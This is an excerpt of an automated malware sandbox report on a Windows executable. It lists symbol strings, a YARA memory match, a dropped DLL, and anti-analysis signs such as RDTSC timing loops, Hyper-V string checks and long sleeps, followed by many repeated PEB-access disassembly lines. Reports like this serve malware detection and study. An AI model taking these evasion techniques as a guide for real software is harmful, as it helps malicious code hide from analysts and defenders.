    Source: Binary string: wntdll.pdbUGP source: 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727268386.00000000369C6000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2729820928.0000000036B7C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 3507071243740008011.exe, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727268386.00000000369C6000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2729820928.0000000036B7C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp

    Data Obfuscation

    Source: Yara match | File source: 00000000.00000002.2445417513.0000000005438000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D3135D push eax; iretd 4_2_36D31369
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D327FA pushad ; ret 4_2_36D327F9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D3225F pushad ; ret 4_2_36D327F9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D3283D push eax; iretd 4_2_36D32858
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D609AD push ecx; mov dword ptr [esp], ecx 4_2_36D609B6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | File created: C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\3507071243740008011.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Saddukisk233\centerleder.ini count: 45722
    Source: C:\Users\user\Desktop\3507071243740008011.exe | API/Special instruction interceptor: Address: 59AA0FB
    Source: C:\Users\user\Desktop\3507071243740008011.exe | API/Special instruction interceptor: Address: 458A0FB
    Source: C:\Users\user\Desktop\3507071243740008011.exe | RDTSC instruction interceptor: First address: 596FD31 second address: 596FD31 instructions: 0x00000000 rdtsc 0x00000002 test cx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FF06CB84AC7h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\3507071243740008011.exe | RDTSC instruction interceptor: First address: 454FD31 second address: 454FD31 instructions: 0x00000000 rdtsc 0x00000002 test cx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FF06CCEEEF7h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DDD1C0 rdtsc
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | API coverage: 0.1 %
    Source: C:\Users\user\Desktop\3507071243740008011.exe TID: 2496 | Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_004065C5 FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00402862 FindFirstFileW
    Source: 3507071243740008011.exe, 00000004.00000002.2767716944.0000000006B4B000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727628175.0000000006B4B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWy
    Source: 3507071243740008011.exe, 00000004.00000002.2767716944.0000000006B4B000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727628175.0000000006B4B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: C:\Users\user\Desktop\3507071243740008011.exe | API call chain: ExitProcess graph end node | graph_0-4600
    Source: C:\Users\user\Desktop\3507071243740008011.exe | API call chain: ExitProcess graph end node | graph_0-4604
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DDD1C0 rdtsc
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA35C0 NtCreateMutant,LdrInitializeThunk
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1D6F0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D916CF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1F6C7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E216CC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E216CC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E216CC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E216CC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8D6E0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8D6E0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DE368C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DE368C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DE368C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DE368C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D576B2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D576B2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D576B2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5D6AA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5D6AA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D99660 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D99660 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DFD660 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D63616 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D63616 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E35636 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D9F603 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D91607 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D657C0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D657C0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D657C0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6D7E0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1D7B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1D7B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E337B6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8D7B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1F78A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DEF7AF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DEF7AF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DEF7AF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DEF7AF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DEF7AF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DE97A9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D73740 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D73740 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D73740 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E33749 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5B765 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5B765 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5B765 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5B765 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0375F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0375F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0375F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0375F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0375F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D9F71F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D9F71F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2972B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1F72E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D65702 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D65702 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D67703 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E3B73C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E3B73C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E3B73C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E3B73C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D59730 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D59730 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6973A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6973A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D95734 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D63720 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7F720 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7F720 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7F720 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E094E0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E354DB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D69486 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D69486 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E074B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5B480 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D574B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D574B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D934B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E3547F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0B450 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0B450 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0B450 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0B450 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1F453 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D61460 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D61460 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D61460 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D61460 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D61460 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DE7410 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8340D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D895DA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DDD5D0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DDD5D0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D955C0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E355C9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E335D7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E335D7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E335D7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DEB594 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DEB594 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E335B6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5758F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5758F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5758F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1F5BE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF35BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF35BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF35BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF35BA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DFD5B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DFD5B0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D815A9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D815A9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D815A9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D815A9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D815A9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D9B570 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D9B570 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0B550 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0B550 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0B550 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5B562 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]
